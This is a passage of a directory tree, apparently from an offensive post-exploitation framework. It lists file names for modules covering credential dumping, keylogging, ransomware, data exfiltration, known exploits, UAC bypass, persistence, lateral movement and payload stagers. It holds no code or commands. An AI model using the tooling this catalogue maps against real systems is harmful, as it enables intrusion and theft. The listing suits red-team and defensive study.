    │   │   │   │   ├── enum_filter_driver.yaml
    │   │   │   │   ├── env.yaml
    │   │   │   │   ├── get_password_policy.yaml
    │   │   │   │   ├── ipconfig.yaml
    │   │   │   │   ├── list_firewall_rules.yaml
    │   │   │   │   ├── listdns.yaml
    │   │   │   │   ├── listmods.yaml
    │   │   │   │   ├── locale.yaml
    │   │   │   │   ├── netGroupList.py
    │   │   │   │   ├── netGroupList.yaml
    │   │   │   │   ├── netGroupListMembers.py
    │   │   │   │   ├── netGroupListMembers.yaml
    │   │   │   │   ├── netLocalGroupList.py
    │   │   │   │   ├── netLocalGroupList.yaml
    │   │   │   │   ├── netLocalGroupListMembers.py
    │   │   │   │   ├── netLocalGroupListMembers.yaml
    │   │   │   │   ├── netloggedon.py
    │   │   │   │   ├── netloggedon.yaml
    │   │   │   │   ├── netsession.yaml
    │   │   │   │   ├── netshares.py
    │   │   │   │   ├── netshares.yaml
    │   │   │   │   ├── netstat.yaml
    │   │   │   │   ├── nettime.yaml
    │   │   │   │   ├── netuptime.yaml
    │   │   │   │   ├── netuser.yaml
    │   │   │   │   ├── netview.yaml
    │   │   │   │   ├── probe.yaml
    │   │   │   │   ├── resources.yaml
    │   │   │   │   ├── routeprint.yaml
    │   │   │   │   ├── schtasksenum.yaml
    │   │   │   │   ├── schtasksquery.yaml
    │   │   │   │   ├── tasklist.yaml
    │   │   │   │   ├── uptime.yaml
    │   │   │   │   ├── whoami.yaml
    │   │   │   │   ├── windowlist.py
    │   │   │   │   ├── windowlist.yaml
    │   │   │   │   ├── wmi_query.py
    │   │   │   │   └── wmi_query.yaml
    │   │   │   ├── tgtdelegation.py
    │   │   │   └── tgtdelegation.yaml
    │   │   ├── csharp
    │   │   │   ├── code_execution
    │   │   │   │   ├── Assembly.yaml
    │   │   │   │   ├── AssemblyReflect.yaml
    │   │   │   │   ├── RunCoff.py
    │   │   │   │   ├── RunCoff.yaml
    │   │   │   │   ├── SharpSploit
    │   │   │   │   │   ├── PowerShell.yaml
    │   │   │   │   │   ├── Shell.yaml
    │   │   │   │   │   ├── ShellCmd.yaml
    │   │   │   │   │   ├── ShellCmdRunas.yaml
    │   │   │   │   │   └── ShellRunAs.yaml
    │   │   │   │   └── Shellcode.yaml
    │   │   │   ├── collection
    │   │   │   │   ├── Certify.yaml
    │   │   │   │   ├── SharpSploit_Keylogger.yaml
    │   │   │   │   └── Sharpdump.yaml
    │   │   │   ├── credentials
    │   │   │   │   ├── Rubeus.yaml
    │   │   │   │   ├── SharpDPAPI.yaml
    │   │   │   │   └── SharpSploit
    │   │   │   │   │   ├── ImpersonateProcess.yaml
    │   │   │   │   │   ├── ImpersonateUser.yaml
    │   │   │   │   │   ├── Kerberoast.yaml
    │   │   │   │   │   ├── MakeToken.yaml
    │   │   │   │   │   └── RevertToSelf.yaml
    │   │   │   ├── management
    │   │   │   │   ├── ProcessInjection.py
    │   │   │   │   ├── ProcessInjection.yaml
    │   │   │   │   ├── SharpSploit
    │   │   │   │   │   ├── BypassAmsi.yaml
    │   │   │   │   │   ├── CreateProcessWithToken.yaml
    │   │   │   │   │   ├── SetRegistryKey.yaml
    │   │   │   │   │   └── SetRemoteRegistryKey.yaml
    │   │   │   │   ├── StratumMiner.yaml
    │   │   │   │   ├── ThreadlessInject.py
    │   │   │   │   ├── ThreadlessInject.yaml
    │   │   │   │   └── VNC.yaml
    │   │   │   ├── persistence
    │   │   │   │   └── SharpSploit
    │   │   │   │   │   ├── PersistAutorun.yaml
    │   │   │   │   │   ├── PersistCOMHijack.yaml
    │   │   │   │   │   ├── PersistStartup.yaml
    │   │   │   │   │   └── PersistWMI.yaml
    │   │   │   ├── privesc
    │   │   │   │   ├── Moriarty.yaml
    │   │   │   │   ├── SharpSploit
    │   │   │   │   │   ├── GetSystem.yaml
    │   │   │   │   │   └── PrivExchange.yaml
    │   │   │   │   └── SharpUp.yaml
    │   │   │   └── situational_awareness
    │   │   │   │   ├── Seatbelt.yaml
    │   │   │   │   ├── SharpSC.yaml
    │   │   │   │   ├── SharpSploit
    │   │   │   │       ├── GetDomainComputer.yaml
    │   │   │   │       ├── GetDomainGroup.yaml
    │   │   │   │       ├── GetDomainUser.yaml
    │   │   │   │       ├── GetNetLocalGroup.yaml
    │   │   │   │       ├── GetNetLocalGroupMember.yaml
    │   │   │   │       ├── GetNetLoggedOnUser.yaml
    │   │   │   │       ├── GetNetSession.yaml
    │   │   │   │       ├── GetRegistryKey.yaml
    │   │   │   │       ├── GetRemoteRegistryKey.yaml
    │   │   │   │       ├── ListDirectory.yaml
    │   │   │   │       ├── Portscan.yaml
    │   │   │   │       └── ProcessList.yaml
    │   │   │   │   └── SharpWMI.yaml
    │   │   ├── powershell
    │   │   │   ├── code_execution
    │   │   │   │   ├── invoke_boolang.yaml
    │   │   │   │   ├── invoke_clearscript.yaml
    │   │   │   │   ├── invoke_dllinjection.yaml
    │   │   │   │   ├── invoke_ironpython.yaml
    │   │   │   │   ├── invoke_ironpython3.yaml
    │   │   │   │   ├── invoke_metasploitpayload.yaml
    │   │   │   │   ├── invoke_ntsd.py
    │   │   │   │   ├── invoke_ntsd.yaml
    │   │   │   │   ├── invoke_reflectivepeinjection.py
    │   │   │   │   ├── invoke_reflectivepeinjection.yaml
    │   │   │   │   ├── invoke_script.py
    │   │   │   │   ├── invoke_script.yaml
    │   │   │   │   ├── invoke_shellcode.py
    │   │   │   │   ├── invoke_shellcode.yaml
    │   │   │   │   ├── invoke_shellcodemsil.py
    │   │   │   │   ├── invoke_shellcodemsil.yaml
    │   │   │   │   └── invoke_ssharp.yaml
    │   │   │   ├── collection
    │   │   │   │   ├── ChromeDump.yaml
    │   │   │   │   ├── FoxDump.yaml
    │   │   │   │   ├── SauronEye.yaml
    │   │   │   │   ├── SharpChromium.py
    │   │   │   │   ├── SharpChromium.yaml
    │   │   │   │   ├── SharpLoginPrompt.yaml
    │   │   │   │   ├── USBKeylogger.yaml
    │   │   │   │   ├── WebcamRecorder.yaml
    │   │   │   │   ├── WireTap.py
    │   │   │   │   ├── WireTap.yaml
    │   │   │   │   ├── browser_data.yaml
    │   │   │   │   ├── clipboard_monitor.yaml
    │   │   │   │   ├── file_finder.yaml
    │   │   │   │   ├── find_interesting_file.yaml
    │   │   │   │   ├── get-winupdates.yaml
    │   │   │   │   ├── get_indexed_item.yaml
    │   │   │   │   ├── get_sql_column_sample_data.py
    │   │   │   │   ├── get_sql_column_sample_data.yaml
    │   │   │   │   ├── get_sql_query.yaml
    │   │   │   │   ├── inveigh.yaml
    │   │   │   │   ├── keylogger.yaml
    │   │   │   │   ├── minidump.py
    │   │   │   │   ├── minidump.yaml
    │   │   │   │   ├── netripper.yaml
    │   │   │   │   ├── ninjacopy.yaml
    │   │   │   │   ├── packet_capture.py
    │   │   │   │   ├── packet_capture.yaml
    │   │   │   │   ├── prompt.yaml
    │   │   │   │   ├── screenshot.py
    │   │   │   │   ├── screenshot.yaml
    │   │   │   │   ├── toasted.yaml
    │   │   │   │   └── vaults
    │   │   │   │   │   ├── add_keepass_config_trigger.yaml
    │   │   │   │   │   ├── find_keepass_config.yaml
    │   │   │   │   │   ├── get_keepass_config_trigger.yaml
    │   │   │   │   │   ├── keethief.yaml
    │   │   │   │   │   └── remove_keepass_config_trigger.yaml
    │   │   │   ├── credentials
    │   │   │   │   ├── DomainPasswordSpray.yaml
    │   │   │   │   ├── VeeamGetCreds.yaml
    │   │   │   │   ├── credential_injection.py
    │   │   │   │   ├── credential_injection.yaml
    │   │   │   │   ├── enum_cred_store.yaml
    │   │   │   │   ├── get_lapspasswords.yaml
    │   │   │   │   ├── invoke_internal_monologue.yaml
    │   │   │   │   ├── invoke_kerberoast.yaml
    │   │   │   │   ├── invoke_ntlmextract.yaml
    │   │   │   │   ├── mimikatz
    │   │   │   │   │   ├── cache.yaml
    │   │   │   │   │   ├── certs.yaml
    │   │   │   │   │   ├── command.yaml
    │   │   │   │   │   ├── dcsync.yaml
    │   │   │   │   │   ├── dcsync_hashdump.py
    │   │   │   │   │   ├── dcsync_hashdump.yaml
    │   │   │   │   │   ├── extract_tickets.yaml
    │   │   │   │   │   ├── golden_ticket.py
    │   │   │   │   │   ├── golden_ticket.yaml
    │   │   │   │   │   ├── keys.yaml
    │   │   │   │   │   ├── logonpasswords.yaml
    │   │   │   │   │   ├── lsadump.py
    │   │   │   │   │   ├── lsadump.yaml
    │   │   │   │   │   ├── mimitokens.py
    │   │   │   │   │   ├── mimitokens.yaml
    │   │   │   │   │   ├── pth.py
    │   │   │   │   │   ├── pth.yaml
    │   │   │   │   │   ├── purge.yaml
    │   │   │   │   │   ├── sam.yaml
    │   │   │   │   │   ├── silver_ticket.py
    │   │   │   │   │   ├── silver_ticket.yaml
    │   │   │   │   │   ├── terminal_server.yaml
    │   │   │   │   │   ├── trust_keys.py
    │   │   │   │   │   └── trust_keys.yaml
    │   │   │   │   ├── powerdump.yaml
    │   │   │   │   ├── sessiongopher.yaml
    │   │   │   │   ├── sharpsecdump.yaml
    │   │   │   │   ├── tokens.py
    │   │   │   │   ├── tokens.yaml
    │   │   │   │   └── vault_credential.yaml
    │   │   │   ├── exfiltration
    │   │   │   │   ├── Invoke_ExfilDataToGitHub.yaml
    │   │   │   │   ├── PSRansom.py
    │   │   │   │   ├── PSRansom.yaml
    │   │   │   │   ├── egresscheck.yaml
    │   │   │   │   └── exfil_dropbox.yaml
    │   │   │   ├── exploitation
    │   │   │   │   ├── exploit_eternalblue.py
    │   │   │   │   ├── exploit_eternalblue.yaml
    │   │   │   │   ├── exploit_jboss.yaml
    │   │   │   │   ├── exploit_jenkins.yaml
    │   │   │   │   └── invoke_spoolsample.yaml
    │   │   │   ├── lateral_movement
    │   │   │   │   ├── inveigh_relay.py
    │   │   │   │   ├── inveigh_relay.yaml
    │   │   │   │   ├── invoke_dcom.py
    │   │   │   │   ├── invoke_dcom.yaml
    │   │   │   │   ├── invoke_executemsbuild.py
    │   │   │   │   ├── invoke_executemsbuild.yaml
    │   │   │   │   ├── invoke_portfwd.yaml
    │   │   │   │   ├── invoke_psexec.py
    │   │   │   │   ├── invoke_psexec.yaml
    │   │   │   │   ├── invoke_psremoting.py
    │   │   │   │   ├── invoke_psremoting.yaml
    │   │   │   │   ├── invoke_smbexec.py
    │   │   │   │   ├── invoke_smbexec.yaml
    │   │   │   │   ├── invoke_sqloscmd.py
    │   │   │   │   ├── invoke_sqloscmd.yaml
    │   │   │   │   ├── invoke_sshcommand.py
    │   │   │   │   ├── invoke_sshcommand.yaml
    │   │   │   │   ├── invoke_wmi.py
    │   │   │   │   ├── invoke_wmi.yaml
    │   │   │   │   ├── invoke_wmi_debugger.py
    │   │   │   │   ├── invoke_wmi_debugger.yaml
    │   │   │   │   ├── jenkins_script_console.py
    │   │   │   │   ├── jenkins_script_console.yaml
    │   │   │   │   ├── new_gpo_immediate_task.py
    │   │   │   │   └── new_gpo_immediate_task.yaml
    │   │   │   ├── management
    │   │   │   │   ├── disable_rdp.yaml
    │   │   │   │   ├── downgrade_account.yaml
    │   │   │   │   ├── enable_multi_rdp.yaml
    │   │   │   │   ├── enable_rdp.yaml
    │   │   │   │   ├── get_domain_sid.yaml
    │   │   │   │   ├── honeyhash.yaml
    │   │   │   │   ├── invoke-downloadfile.yaml
    │   │   │   │   ├── invoke_bypass.py
    │   │   │   │   ├── invoke_bypass.yaml
    │   │   │   │   ├── invoke_sharpchisel.yaml
    │   │   │   │   ├── invoke_socksproxy.yaml
    │   │   │   │   ├── lock.yaml
    │   │   │   │   ├── logoff.py
    │   │   │   │   ├── logoff.yaml
    │   │   │   │   ├── mailraider
    │   │   │   │   │   ├── disable_security.py
    │   │   │   │   │   ├── disable_security.yaml
    │   │   │   │   │   ├── get_emailitems.py
    │   │   │   │   │   ├── get_emailitems.yaml
    │   │   │   │   │   ├── get_subfolders.yaml
    │   │   │   │   │   ├── mail_search.yaml
    │   │   │   │   │   ├── search_gal.yaml
    │   │   │   │   │   ├── send_mail.yaml
    │   │   │   │   │   └── view_email.yaml
    │   │   │   │   ├── phant0m.yaml
    │   │   │   │   ├── powercat.yaml
    │   │   │   │   ├── psinject.py
    │   │   │   │   ├── psinject.yaml
    │   │   │   │   ├── reflective_inject.py
    │   │   │   │   ├── reflective_inject.yaml
    │   │   │   │   ├── restart.yaml
    │   │   │   │   ├── runas.py
    │   │   │   │   ├── runas.yaml
    │   │   │   │   ├── shinject.py
    │   │   │   │   ├── shinject.yaml
    │   │   │   │   ├── sid_to_user.yaml
    │   │   │   │   ├── spawn.py
    │   │   │   │   ├── spawn.yaml
    │   │   │   │   ├── spawnas.py
    │   │   │   │   ├── spawnas.yaml
    │   │   │   │   ├── start-processasuser.yaml
    │   │   │   │   ├── switch_listener.py
    │   │   │   │   ├── switch_listener.yaml
    │   │   │   │   ├── timestomp.yaml
    │   │   │   │   ├── user_to_sid.py
    │   │   │   │   ├── user_to_sid.yaml
    │   │   │   │   ├── vnc.yaml
    │   │   │   │   ├── wdigest_downgrade.yaml
    │   │   │   │   └── zipfolder.yaml
    │   │   │   ├── persistence
    │   │   │   │   ├── elevated
    │   │   │   │   │   ├── registry.py
    │   │   │   │   │   ├── registry.yaml
    │   │   │   │   │   ├── rid_hijack.yaml
    │   │   │   │   │   ├── schtasks.py
    │   │   │   │   │   ├── schtasks.yaml
    │   │   │   │   │   ├── wmi.py
    │   │   │   │   │   ├── wmi.yaml
    │   │   │   │   │   ├── wmi_updater.py
    │   │   │   │   │   └── wmi_updater.yaml
    │   │   │   │   ├── misc
    │   │   │   │   │   ├── add_netuser.yaml
    │   │   │   │   │   ├── add_sid_history.py
    │   │   │   │   │   ├── add_sid_history.yaml
    │   │   │   │   │   ├── debugger.py
    │   │   │   │   │   ├── debugger.yaml
    │   │   │   │   │   ├── disable_machine_acct_change.yaml
    │   │   │   │   │   ├── get_ssps.yaml
    │   │   │   │   │   ├── install_ssp.yaml
    │   │   │   │   │   ├── memssp.yaml
    │   │   │   │   │   └── skeleton_key.yaml
    │   │   │   │   ├── powerbreach
    │   │   │   │   │   ├── deaduser.py
    │   │   │   │   │   ├── deaduser.yaml
    │   │   │   │   │   ├── eventlog.py
    │   │   │   │   │   ├── eventlog.yaml
    │   │   │   │   │   ├── resolver.py
    │   │   │   │   │   └── resolver.yaml
    │   │   │   │   └── userland
    │   │   │   │   │   ├── backdoor_lnk.py
    │   │   │   │   │   ├── backdoor_lnk.yaml
    │   │   │   │   │   ├── phishing_lnk.yaml
    │   │   │   │   │   ├── registry.py
    │   │   │   │   │   ├── registry.yaml
    │   │   │   │   │   ├── schtasks.py
    │   │   │   │   │   └── schtasks.yaml
    │   │   │   ├── privesc
    │   │   │   │   ├── ask.py
    │   │   │   │   ├── ask.yaml
    │   │   │   │   ├── bypassuac.py
    │   │   │   │   ├── bypassuac.yaml
    │   │   │   │   ├── bypassuac_env.py
    │   │   │   │   ├── bypassuac_env.yaml
    │   │   │   │   ├── bypassuac_eventvwr.py
    │   │   │   │   ├── bypassuac_eventvwr.yaml
    │   │   │   │   ├── bypassuac_fodhelper.py
    │   │   │   │   ├── bypassuac_fodhelper.yaml
    │   │   │   │   ├── bypassuac_fodhelper_progids.yaml
    │   │   │   │   ├── bypassuac_sdctlbypass.py
    │   │   │   │   ├── bypassuac_sdctlbypass.yaml
    │   │   │   │   ├── bypassuac_tokenmanipulation.py
    │   │   │   │   ├── bypassuac_tokenmanipulation.yaml
    │   │   │   │   ├── bypassuac_wscript.py
    │   │   │   │   ├── bypassuac_wscript.yaml
    │   │   │   │   ├── getsystem.yaml
    │   │   │   │   ├── gpp.yaml
    │   │   │   │   ├── mcafee_sitelist.yaml
    │   │   │   │   ├── ms16-032.py
    │   │   │   │   ├── ms16-032.yaml
    │   │   │   │   ├── ms16-135.py
    │   │   │   │   ├── ms16-135.yaml
    │   │   │   │   ├── powerup
    │   │   │   │   │   ├── allchecks.yaml
    │   │   │   │   │   ├── find_dllhijack.yaml
    │   │   │   │   │   ├── service_exe_restore.yaml
    │   │   │   │   │   ├── service_exe_stager.py
    │   │   │   │   │   ├── service_exe_stager.yaml
    │   │   │   │   │   ├── service_exe_useradd.yaml
    │   │   │   │   │   ├── service_stager.py
    │   │   │   │   │   ├── service_stager.yaml
    │   │   │   │   │   ├── service_useradd.yaml
    │   │   │   │   │   ├── write_dllhijacker.py
    │   │   │   │   │   └── write_dllhijacker.yaml
    │   │   │   │   ├── printdemon.yaml
    │   │   │   │   ├── printnightmare.yaml
    │   │   │   │   ├── privesccheck.yaml
    │   │   │   │   ├── sherlock.yaml
    │   │   │   │   ├── sweetpotato.yaml
    │   │   │   │   ├── tater.yaml
    │   │   │   │   ├── watson.yaml
    │   │   │   │   ├── winPEAS.yaml
    │   │   │   │   └── zerologon.yaml
    │   │   │   ├── recon
    │   │   │   │   ├── fetch_brute_local.py
    │   │   │   │   ├── fetch_brute_local.yaml
    │   │   │   │   ├── find_fruit.py
    │   │   │   │   ├── find_fruit.yaml
    │   │   │   │   ├── get_sql_server_login_default_pw.py
    │   │   │   │   ├── get_sql_server_login_default_pw.yaml
    │   │   │   │   └── http_login.yaml
    │   │   │   ├── situational_awareness
    │   │   │   │   ├── host
    │   │   │   │   │   ├── antivirusproduct.yaml
    │   │   │   │   │   ├── applockerstatus.yaml
    │   │   │   │   │   ├── computerdetails.py
    │   │   │   │   │   ├── computerdetails.yaml
    │   │   │   │   │   ├── dnsserver.yaml
    │   │   │   │   │   ├── findtrusteddocuments.yaml
    │   │   │   │   │   ├── get_pathacl.yaml
    │   │   │   │   │   ├── get_proxy.yaml
    │   │   │   │   │   ├── get_uaclevel.yaml
    │   │   │   │   │   ├── hostrecon.yaml
    │   │   │   │   │   ├── monitortcpconnections.yaml
    │   │   │   │   │   ├── paranoia.yaml
    │   │   │   │   │   └── winenum.yaml
    │   │   │   │   └── network
    │   │   │   │   │   ├── arpscan.yaml
    │   │   │   │   │   ├── bloodhound.yaml
    │   │   │   │   │   ├── get_kerberos_service_ticket.yaml
    │   │   │   │   │   ├── get_spn.yaml
    │   │   │   │   │   ├── get_sql_instance_domain.yaml
    │   │   │   │   │   ├── get_sql_server_info.py
    │   │   │   │   │   ├── get_sql_server_info.yaml
    │   │   │   │   │   ├── portscan.yaml
    │   │   │   │   │   ├── powermad
    │   │   │   │   │       ├── get_adidns_permission.yaml
    │   │   │   │   │       └── get_adidns_zone.yaml
    │   │   │   │   │   ├── powerview
    │   │   │   │   │       ├── find_foreign_group.yaml
    │   │   │   │   │       ├── find_foreign_user.yaml
    │   │   │   │   │       ├── find_gpo_computer_admin.yaml
    │   │   │   │   │       ├── find_gpo_location.yaml
    │   │   │   │   │       ├── find_localadmin_access.yaml
    │   │   │   │   │       ├── find_managed_security_group.yaml
    │   │   │   │   │       ├── get_cached_rdpconnection.yaml
    │   │   │   │   │       ├── get_computer.yaml
    │   │   │   │   │       ├── get_dfs_share.yaml
    │   │   │   │   │       ├── get_domain_controller.yaml
    │   │   │   │   │       ├── get_domain_policy.yaml
    │   │   │   │   │       ├── get_domain_trust.yaml
    │   │   │   │   │       ├── get_fileserver.yaml
    │   │   │   │   │       ├── get_forest.yaml
    │   │   │   │   │       ├── get_forest_domain.yaml
    │   │   │   │   │       ├── get_gpo.yaml
    │   │   │   │   │       ├── get_gpo_computer.py
    │   │   │   │   │       ├── get_gpo_computer.yaml
    │   │   │   │   │       ├── get_group.yaml
    │   │   │   │   │       ├── get_group_member.yaml
    │   │   │   │   │       ├── get_localgroup.yaml
    │   │   │   │   │       ├── get_loggedon.yaml
    │   │   │   │   │       ├── get_object_acl.yaml
    │   │   │   │   │       ├── get_ou.yaml
    │   │   │   │   │       ├── get_rdp_session.yaml
    │   │   │   │   │       ├── get_session.yaml
    │   │   │   │   │       ├── get_site.yaml
    │   │   │   │   │       ├── get_subnet.yaml
    │   │   │   │   │       ├── get_subnet_ranges.py
    │   │   │   │   │       ├── get_subnet_ranges.yaml
    │   │   │   │   │       ├── get_user.yaml
    │   │   │   │   │       ├── map_domain_trust.yaml
    │   │   │   │   │       ├── process_hunter.yaml
    │   │   │   │   │       ├── set_ad_object.yaml
    │   │   │   │   │       ├── share_finder.yaml
    │   │   │   │   │       └── user_hunter.yaml
    │   │   │   │   │   ├── reverse_dns.yaml
    │   │   │   │   │   ├── sharphound.yaml
    │   │   │   │   │   ├── smbautobrute.yaml
    │   │   │   │   │   ├── smblogin.yaml
    │   │   │   │   │   └── smbscanner.yaml
    │   │   │   └── trollsploit
    │   │   │   │   ├── get_schwifty.yaml
    │   │   │   │   ├── invoke_bsod.yaml
    │   │   │   │   ├── message.yaml
    │   │   │   │   ├── process_killer.yaml
    │   │   │   │   ├── rick_ascii.yaml
    │   │   │   │   ├── rick_astley.yaml
    │   │   │   │   ├── thunderstruck.yaml
    │   │   │   │   ├── voicetroll.yaml
    │   │   │   │   ├── wallpaper.yaml
    │   │   │   │   └── wlmdr.yaml
    │   │   ├── powershell_template.py
    │   │   ├── powershell_template.yaml
    │   │   ├── python
    │   │   │   ├── code_execution
    │   │   │   │   ├── invoke_script.py
    │   │   │   │   ├── invoke_script.yaml
    │   │   │   │   └── powershell_execution.yaml
    │   │   │   ├── collection
    │   │   │   │   ├── linux
    │   │   │   │   │   ├── hashdump.yaml
    │   │   │   │   │   ├── keylogger.yaml
    │   │   │   │   │   ├── mimipenguin.yaml
    │   │   │   │   │   ├── pillage_user.yaml
    │   │   │   │   │   ├── sniffer.yaml
    │   │   │   │   │   └── xkeylogger.yaml
    │   │   │   │   ├── osx
    │   │   │   │   │   ├── browser_dump.yaml
    │   │   │   │   │   ├── clipboard.yaml
    │   │   │   │   │   ├── hashdump.yaml
    │   │   │   │   │   ├── imessage_dump.py
    │   │   │   │   │   ├── imessage_dump.yaml
    │   │   │   │   │   ├── kerberosdump.yaml
    │   │   │   │   │   ├── keychaindump.yaml
    │   │   │   │   │   ├── keychaindump_chainbreaker.yaml
    │   │   │   │   │   ├── keychaindump_decrypt.yaml
    │   │   │   │   │   ├── keylogger.yaml
    │   │   │   │   │   ├── native_screenshot.yaml
    │   │   │   │   │   ├── native_screenshot_mss.py
    │   │   │   │   │   ├── native_screenshot_mss.yaml
    │   │   │   │   │   ├── osx_mic_record.yaml
    │   │   │   │   │   ├── pillage_user.yaml
    │   │   │   │   │   ├── prompt.py
    │   │   │   │   │   ├── prompt.yaml
    │   │   │   │   │   ├── screensaver_alleyoop.yaml
    │   │   │   │   │   ├── screenshot.yaml
    │   │   │   │   │   ├── search_email.py
    │   │   │   │   │   ├── search_email.yaml
    │   │   │   │   │   ├── sniffer.py
    │   │   │   │   │   ├── sniffer.yaml
    │   │   │   │   │   └── webcam.yaml
    │   │   │   │   └── windows
    │   │   │   │   │   └── TicketDumper.yml
    │   │   │   ├── discovery
    │   │   │   │   └── nameserver.yaml
    │   │   │   ├── exploit
    │   │   │   │   └── web
    │   │   │   │   │   └── jboss_jmx.yaml
    │   │   │   ├── lateral_movement
    │   │   │   │   └── multi
    │   │   │   │   │   ├── ssh_command.yaml
    │   │   │   │   │   ├── ssh_launcher.py
    │   │   │   │   │   └── ssh_launcher.yaml
    │   │   │   ├── management
    │   │   │   │   ├── multi
    │   │   │   │   │   ├── kerberos_inject.yaml
    │   │   │   │   │   ├── socks.yaml
    │   │   │   │   │   ├── spawn.py
    │   │   │   │   │   └── spawn.yaml
    │   │   │   │   └── osx
    │   │   │   │   │   ├── screen_sharing.yaml
    │   │   │   │   │   ├── shellcodeinject64.py
    │   │   │   │   │   └── shellcodeinject64.yaml
    │   │   │   ├── persistence
    │   │   │   │   ├── multi
    │   │   │   │   │   ├── crontab.yaml
    │   │   │   │   │   ├── desktopfile.py
    │   │   │   │   │   └── desktopfile.yaml
    │   │   │   │   └── osx
    │   │   │   │   │   ├── CreateHijacker.py
    │   │   │   │   │   ├── CreateHijacker.yaml
    │   │   │   │   │   ├── LaunchAgent.py
    │   │   │   │   │   ├── LaunchAgent.yaml
    │   │   │   │   │   ├── LaunchAgentUserLandPersistence.py
    │   │   │   │   │   ├── LaunchAgentUserLandPersistence.yaml
    │   │   │   │   │   ├── RemoveLaunchAgent.yaml
    │   │   │   │   │   ├── loginhook.py
    │   │   │   │   │   ├── loginhook.yaml
    │   │   │   │   │   ├── mail.py
    │   │   │   │   │   └── mail.yaml
    │   │   │   ├── privesc
    │   │   │   │   ├── linux
    │   │   │   │   │   ├── linux_priv_checker.yaml
    │   │   │   │   │   └── unix_privesc_check.yaml
    │   │   │   │   ├── multi
    │   │   │   │   │   ├── CVE-2021-3560.py
    │   │   │   │   │   ├── CVE-2021-3560.yaml
    │   │   │   │   │   ├── CVE-2021-4034.py
    │   │   │   │   │   ├── CVE-2021-4034.yaml
    │   │   │   │   │   ├── bashdoor.py
    │   │   │   │   │   ├── bashdoor.yaml
    │   │   │   │   │   ├── sudo_spawn.py
    │   │   │   │   │   └── sudo_spawn.yaml
    │   │   │   │   ├── osx
    │   │   │   │   │   ├── dyld_print_to_file.py
    │   │   │   │   │   ├── dyld_print_to_file.yaml
    │   │   │   │   │   ├── piggyback.py
    │   │   │   │   │   └── piggyback.yaml
    │   │   │   │   └── windows
    │   │   │   │   │   └── get_gpppasswords.yaml
    │   │   │   ├── situational_awareness
    │   │   │   │   ├── host
    │   │   │   │   │   ├── multi
    │   │   │   │   │   │   ├── SuidGuidSearch.yaml
    │   │   │   │   │   │   ├── WorldWriteableFileSearch.yaml
    │   │   │   │   │   │   └── linpeas.yaml
    │   │   │   │   │   └── osx
    │   │   │   │   │   │   ├── HijackScanner.yaml
    │   │   │   │   │   │   ├── situational_awareness.py
    │   │   │   │   │   │   └── situational_awareness.yaml
    │   │   │   │   └── network
    │   │   │   │   │   ├── active_directory
    │   │   │   │   │       ├── dscl_get_groupmembers.yaml
    │   │   │   │   │       ├── dscl_get_groups.yaml
    │   │   │   │   │       ├── dscl_get_users.yaml
    │   │   │   │   │       ├── get_computers.yaml
    │   │   │   │   │       ├── get_domaincontrollers.yaml
    │   │   │   │   │       ├── get_fileservers.yaml
    │   │   │   │   │       ├── get_groupmembers.yaml
    │   │   │   │   │       ├── get_groupmemberships.yaml
    │   │   │   │   │       ├── get_groups.yaml
    │   │   │   │   │       ├── get_ous.yaml
    │   │   │   │   │       ├── get_userinformation.yaml
    │   │   │   │   │       └── get_users.yaml
    │   │   │   │   │   ├── dcos
    │   │   │   │   │       ├── chronos_api_add_job.yaml
    │   │   │   │   │       ├── chronos_api_delete_job.yaml
    │   │   │   │   │       ├── chronos_api_start_job.yaml
    │   │   │   │   │       ├── etcd_crawler.yaml
    │   │   │   │   │       ├── marathon_api_create_start_app.yaml
    │   │   │   │   │       └── marathon_api_delete_app.yaml
    │   │   │   │   │   ├── find_fruit.yaml
    │   │   │   │   │   ├── gethostbyname.yaml
    │   │   │   │   │   ├── http_rest_api.yaml
    │   │   │   │   │   ├── port_scan.yaml
    │   │   │   │   │   └── smb_mount.yaml
    │   │   │   └── trollsploit
    │   │   │   │   └── osx
    │   │   │   │       ├── change_background.yaml
    │   │   │   │       ├── login_message.yaml
    │   │   │   │       ├── say.yaml
    │   │   │   │       └── thunderstruck.yaml
    │   │   ├── python_jobs_template.py
    │   │   ├── python_template.py
    │   │   └── python_template.yaml
    │   ├── plugins
    │   │   ├── __init__.py
    │   │   ├── basic_reporting
    │   │   │   ├── __init__.py
    │   │   │   ├── basic_reporting.py
    │   │   │   └── plugin.yaml
    │   │   └── example
    │   │   │   ├── __init__.py
    │   │   │   ├── example.py
    │   │   │   ├── example_helpers.py
    │   │   │   └── plugin.yaml
    │   ├── server.py
    │   ├── stagers
    │   │   ├── CSharpPS.yaml
    │   │   ├── CSharpPy.yaml
    │   │   ├── Sharpire.yaml
    │   │   ├── linux
    │   │   │   ├── bash.py
    │   │   │   └── pyinstaller.py
    │   │   ├── multi
    │   │   │   ├── generate_agent.py
    │   │   │   ├── go_exe.py
    │   │   │   ├── launcher.py
    │   │   │   └── macro.py
    │   │   ├── osx
    │   │   │   ├── applescript.py
    │   │   │   ├── application.py
    │   │   │   ├── ducky.py
    │   │   │   ├── dylib.py
    │   │   │   ├── jar.py
    │   │   │   ├── macho.py
    │   │   │   ├── macro.py
    │   │   │   ├── safari_launcher.py
    │   │   │   ├── shellcode.py
    │   │   │   └── teensy.py
    │   │   └── windows
    │   │   │   ├── bunny.py
    │   │   │   ├── cmd_exec.py
    │   │   │   ├── csharp_exe.py
    │   │   │   ├── dll.py
    │   │   │   ├── ducky.py
    │   │   │   ├── hta.py
    │   │   │   ├── launcher_bat.py
    │   │   │   ├── launcher_vbs.py
    │   │   │   ├── launcher_xml.py
    │   │   │   ├── macro.py
    │   │   │   ├── shellcode.py
    │   │   │   ├── teensy.py
    │   │   │   ├── war.py
    │   │   │   └── wmic.py
    │   └── utils
    │   │   ├── __init__.py
    │   │   ├── bof_packer.py
    │   │   ├── data_util.py
    │   │   ├── datetime_util.py
    │   │   ├── file_util.py
    │   │   ├── git_util.py
    │   │   ├── listener_util.py
    │   │   ├── log_util.py
    │   │   ├── math_util.py
    │   │   ├── module_util.py
    │   │   ├── option_util.py
    │   │   └── string_util.py
    └── test
    │   ├── __init__.py
    │   ├── avatar.png
    │   ├── avatar2.png
    │   ├── conftest.py
    │   ├── data
    │       ├── module_source
    │       │   ├── credentials
    │       │   │   ├── Invoke-InternalMonologue.ps1
    │       │   │   ├── Invoke-Kerberoast.ps1
    │       │   │   └── Invoke-Mimikatz.ps1
    │       │   └── custom_module_auto_get_source.py
    │       ├── modules
    │       │   ├── test_custom_module.py
    │       │   ├── test_custom_module.yaml
    │       │   ├── test_custom_module_auto_finalize.py
    │       │   ├── test_custom_module_auto_finalize.yaml
    │       │   ├── test_custom_module_auto_get_source.py
